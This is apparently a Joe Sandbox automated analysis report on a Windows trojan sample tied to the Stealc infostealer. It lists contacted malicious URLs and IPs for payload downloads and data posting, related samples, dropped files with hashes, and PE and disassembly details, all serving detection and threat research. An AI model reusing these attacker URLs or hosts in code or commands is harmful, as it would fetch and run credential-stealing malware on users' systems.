http://92.255.57.89/697b92cb4e247842/sqlite3.dll	1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmp	false		high
http://92.255.57.89/697b92cb4e247842/sqlite3.dll~	1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89/45c616e921a794b8.php2dPf	1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exe	SEejSLAS9f.exe, SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmp, SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000970000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DEI	SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.179.207	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
92.255.57.89	unknown	Russian Federation	42253	TELSPRU	true
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572886
Start date and time:	2024-12-11 06:56:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SEejSLAS9f.exe renamed because original name is a hash value
Original Sample Name:	f538d845b52f9d902ee451636d79df4d.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/7@1/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 57 Number of non-executed functions: 324
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.20, 4.245.163.56, 20.190.147.10, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:57:00	API Interceptor	8905413x Sleep call for process: SEejSLAS9f.exe modified
00:57:54	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.179.207	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse
	XOr3Kqyo9n.exe	Get hash	malicious	Stealc	Browse
	0r9PL33C8E.exe	Get hash	malicious	Stealc	Browse
	Pw2KHOL9Z8.exe	Get hash	malicious	Stealc	Browse
	o3QbCA4xLs.exe	Get hash	malicious	Stealc, Vidar	Browse
	XhYAqi0wi5.exe	Get hash	malicious	Stealc	Browse
	Uviv7rEtnt.exe	Get hash	malicious	Stealc, Vidar	Browse
92.255.57.89	mMgFHz9PdG.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	vCZfRWB1kd.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	1891f566c018182f1b5826b5fe2a05d6927aff15638d2.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	L51yh4SC75.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	84b4eda5d456a2c49d117a0b99bc2ed03044eaa144eb5.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	yZB8qfUJJu.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	5gR5rEGCfw.exe	Get hash	malicious	Stealc, Vidar	Browse	92.255.57.89/45c616e921a794b8.php
176.113.115.19	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
post-to-me.com	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	104.21.56.70
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	vwkb5DQRAL.exe	Get hash	malicious	Stealc, Vidar	Browse	104.21.56.70
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse	172.67.179.207
	XOr3Kqyo9n.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	0r9PL33C8E.exe	Get hash	malicious	Stealc	Browse	172.67.179.207

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	CJE003889.exe	Get hash	malicious	FormBook	Browse	172.67.158.81
	https://hongkongliving.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.18.33.8
	Hays eft_Receipt number N302143235953.htm	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe	Get hash	malicious	Poisonivy	Browse	172.67.26.92
	Mozi.m.elf	Get hash	malicious	Mirai	Browse	172.71.119.218
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	EFT Remittance_(Deerequipment)CQDM.html	Get hash	malicious	Unknown	Browse	104.21.18.132
	https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://on-chainevm.pages.dev	Get hash	malicious	HTMLPhisher	Browse	104.16.79.73
	https://vcsfi.kidsavancados.com/	Get hash	malicious	Captcha Phish	Browse	104.21.9.144
TELSPRU	mMgFHz9PdG.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	vCZfRWB1kd.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	1891f566c018182f1b5826b5fe2a05d6927aff15638d2.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	L51yh4SC75.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	84b4eda5d456a2c49d117a0b99bc2ed03044eaa144eb5.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	yZB8qfUJJu.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	5gR5rEGCfw.exe	Get hash	malicious	Stealc, Vidar	Browse	92.255.57.89
SELECTELRU	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	5gR5rEGCfw.exe	Get hash	malicious	Stealc, Vidar	Browse	176.113.115.215
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	45.89.231.211
	5EZLEXDveC.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	176.113.115.163
	teste.sh4.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	45.138.214.123
	xd.sh4.elf	Get hash	malicious	Mirai	Browse	176.124.33.0
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	176.113.115.37

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe	Get hash	malicious	Poisonivy	Browse	172.67.179.207
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	Confirm revised invoice to proceed with payment ASAP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.179.207
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exe	Get hash	malicious	GuLoader	Browse	172.67.179.207
	Bank Swift and SOA PRN0072700314159453_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.179.207
	ST07933.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.179.207
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	172.67.179.207

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1D71.tmp.exe_1918b89e0607a918bed5cdf39c44a397aabe7f_8a7f9c8d_8ad28056-b3a7-4129-a303-e0ecd333cb80\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9638393213416602
Encrypted:	false
SSDEEP:	192:IEHUQe0MDDPj/XZrP2izuiFSZ24IO8do:L7FMDDPjtFzuiFSY4IO8d
MD5:	FC61ED4430BD97C6B5DA691EC78538B2
SHA1:	05D4D5301863E219BDF58AA6C2E20520A02C952E
SHA-256:	1E10682B0E35F64CADF5E74E57A73A0520E504F28F364A717D6F1377D51620F9
SHA-512:	C42C2FA15B392F1E49CEA0F782925589DAA4031BECDA942101223A36EB8FFE14F27DDA2EC675D97F052C13FD27C6389D3D13E8180A51D90FC719554E0972827E
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.7.0.2.5.3.4.1.9.8.8.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.7.0.2.5.4.5.2.9.2.6.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.d.2.8.0.5.6.-.b.3.a.7.-.4.1.2.9.-.a.3.0.3.-.e.0.e.c.d.3.3.3.c.b.8.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.e.a.2.6.a.6.-.1.4.6.a.-.4.8.2.b.-.a.5.1.9.-.c.0.8.0.0.2.4.c.c.d.5.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.D.7.1...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.b.4.-.0.0.0.1.-.0.0.1.4.-.c.1.9.c.-.4.d.8.0.9.1.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.4.6.0.f.8.d.3.a.6.8.0.1.5.f.2.7.9.2.c.6.6.9.6.b.2.6.6.7.8.d.2.0.0.0.0.1.5.0.6.!.0.0.0.0.6.d.b.3.a.6.b.2.2.e.4.5.2.f.f.6.b.a.5.5.b.b.2.8.d.7.8.d.c.a.1.e.a.0.f.d.e.a.6.a.!.1.D.7.1...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6816.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Dec 11 05:57:33 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	62018
Entropy (8bit):	1.816260131152295
Encrypted:	false
SSDEEP:	192:gzJhQi5XcbmO/X2OQOJwhxjCHyDEgB4nzrGGjkndccT7Fyghr7j6Oi0x:IQ/bmOZQEKuKHB4xily+uOpx
MD5:	A55C35E30E11850AC3DF680209BB17BD
SHA1:	2E48D8AA1C526DB22AD70019466697C8AE95C32B
SHA-256:	909DA38B5E5FF49167B814EBE9B322A44AA1B09EB049C8B634EBF3A50922DD25
SHA-512:	B342899A595CBA927DA81EAFAD60BB9E7D19B431F3393ED203560BD9F149103FB48A7E020A2E599F132C7FAC1CBB93C12AE0627FBCB0059C3E34B20BB9161393
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........)Yg............4...............<.......t....*..........T.......8...........T............3..B.......................................................................................................eJ......H.......GenuineIntel............T............)Yg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AF5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8322
Entropy (8bit):	3.695316898615795
Encrypted:	false
SSDEEP:	192:R6l7wVeJc06C6YT/6sgmfKJpDM89btOsfgPm:R6lXJ36C6Yr6sgmfKVtNfV
MD5:	E2E8ED8B697994D07E870FBF3D6A5587
SHA1:	77B4DBDE4FB8E0C3A3436BB10CC31CE3B3E2D15D
SHA-256:	C4A4B14AE88CE0E255A08FDCACFBF7CEB2A042CBD4D2F1A3A5909DBF9D78D2D6
SHA-512:	1C66131D5FECBB9CA48241238AC63B941B056041CD59899B66C6885D510C0B2FC9117089676F28E22604FEC2787CD8F7EF7A19468C651A0C824B6EBED6ED51A8
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BB2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4575
Entropy (8bit):	4.44015329552771
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg77aI95WWpW8VYEYm8M4JheFN+q8dIEHNezypd:uIjfaI7737VkJwTEEzypd
MD5:	1D012A01D74E3177A6FAF45BC7E679E7
SHA1:	E611FACE5BCA72D09BCA36E479B308E2A481DB9B
SHA-256:	D764A30533B24237D2AA8AC2A9316C59BDCA40CE3565CE8E8F0387B40064DCC1
SHA-512:	F18F740B949868271DC2F55A7638A84C5AE276F31ADFD71C4D5C1B5F111201AD6041517F2383E171A9979DF3E96EC0320AD3D485AF648C42945AED429CB50665
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="626220" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\SEejSLAS9f.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	304128
Entropy (8bit):	6.255602222353754
Encrypted:	false
SSDEEP:	3072:nkCrb2hNwf/fDwvofR3pQ0dZSzK3i1QPlvtfABAmffbj7AKzxSQ9Ra+pSzuZ:kCv2hNSf7ZzdZSG3i1KllImmff/txjo
MD5:	9D773E345DCA0487C5654A92E6340BAA
SHA1:	6DB3A6B22E452FF6BA55BB28D78DCA1EA0FDEA6A
SHA-256:	176EE771C395DC6748A4C973A15D53A5D68B9704989349A862714E4BDC0F9FDA
SHA-512:	A8D94374D51141FD9654E960E6B1F28FC10ACE788BEE77DB1EFE01AA1A3020CB7F53230238B832BE1EBADFA73076AC51157D1C18175ABEE0FE66566A3D6786AC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K........xM....x\....xJ............xC....x]....xX...Rich.*.........................PE..L......d......................?...................@.......................... B.....~........................................'..d.....A.0...............................................................................l............................text............................... ..`.rdata..j ......."..................@..@.data....=..@...l..................@....rsrc...0.....A.....................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

Download File

Process:	C:\Users\user\Desktop\SEejSLAS9f.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	304128
Entropy (8bit):	6.255602222353754
Encrypted:	false
SSDEEP:	3072:nkCrb2hNwf/fDwvofR3pQ0dZSzK3i1QPlvtfABAmffbj7AKzxSQ9Ra+pSzuZ:kCv2hNSf7ZzdZSG3i1KllImmff/txjo
MD5:	9D773E345DCA0487C5654A92E6340BAA
SHA1:	6DB3A6B22E452FF6BA55BB28D78DCA1EA0FDEA6A
SHA-256:	176EE771C395DC6748A4C973A15D53A5D68B9704989349A862714E4BDC0F9FDA
SHA-512:	A8D94374D51141FD9654E960E6B1F28FC10ACE788BEE77DB1EFE01AA1A3020CB7F53230238B832BE1EBADFA73076AC51157D1C18175ABEE0FE66566A3D6786AC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K........xM....x\....xJ............xC....x]....xX...Rich.*.........................PE..L......d......................?...................@.......................... B.....~........................................'..d.....A.0...............................................................................l............................text............................... ..`.rdata..j ......."..................@..@.data....=..@...l..................@....rsrc...0.....A.....................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465430379914935
Encrypted:	false
SSDEEP:	6144:YIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNedwBCswSb6:NXD94+WlLZMM6YFHA+6
MD5:	723CACAE91A705807A19BB1384517D0F
SHA1:	C8881F170A340BB1D6FD12FA175E90FC81835663
SHA-256:	15D9498B56B5AE6CB7F29282F1527119A82B249C1F3ED934A7BC6C0E7DC8C2C9
SHA-512:	AFD95C278AE6EEB08882BDF6E56E0CCAB77C65A31F8F1A1BF605C6DAA59E884C5C68B3F669BA4E2DCD9785311F54A0E279BF98280013ABE67AB5DAEF02758E8E
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..<..K................................................................................................................................................................................................................................................................................................................................................+.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.969411140786927
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SEejSLAS9f.exe
File size:	428'544 bytes
MD5:	f538d845b52f9d902ee451636d79df4d
SHA1:	19b2b01778f50ce375ccfa4c33602b5c5665ccaf
SHA256:	9a1c659df3f2a04d8982ea66ce8397736c98eda3059ceebc467033ac35e176ed
SHA512:	8f92a6dfd5e0b7539dc37158a3bd96194ddb18ca6bd73d6ffdb7697bdb07344fe9057fc18b031dbb6a0b85480d630b49fe5ba2ff7cecd68bc129fbb79ceb25ec
SSDEEP:	6144:qe7kGTJjzllLURC56vpVvdxsgUhQyljBT26mLzEF2bAfT80OYw:ttTRjEDvzsgsBBwfE0Ao0Ov
TLSH:	5694DF1275E1842EEEF74B312975D6B0193BBC625B70809E3694329F1E732E18E21F97
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K............xM.....x\.....xJ..................xC.....x].....xX....Rich.*..........................PE..L......e...

File Icon


Icon Hash:	46c7c30b0f4e0d59

Static PE Info

General

Entrypoint:	0x4014f7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x652EE37F [Tue Oct 17 19:41:51 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	65fde8098f3aba7bab4d6464cb5259fe

Entrypoint Preview

Instruction
call 00007F81C0EE5000h
jmp 00007F81C0EE24FDh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00454878h], eax
mov dword ptr [00454874h], ecx
mov dword ptr [00454870h], edx
mov dword ptr [0045486Ch], ebx
mov dword ptr [00454868h], esi
mov dword ptr [00454864h], edi
mov word ptr [00454890h], ss
mov word ptr [00454884h], cs
mov word ptr [00454860h], ds
mov word ptr [0045485Ch], es
mov word ptr [00454858h], fs
mov word ptr [00454854h], gs
pushfd
pop dword ptr [00454888h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0045487Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00454880h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0045488Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [004547C8h], 00010001h
mov eax, dword ptr [00454880h]
mov dword ptr [0045477Ch], eax
mov dword ptr [00454770h], C0000409h
mov dword ptr [00454774h], 00000001h
mov eax, dword ptr [00452004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00452008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000C0h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x507f4	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42e000	0x11d30	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x504c0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4f000	0x16c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
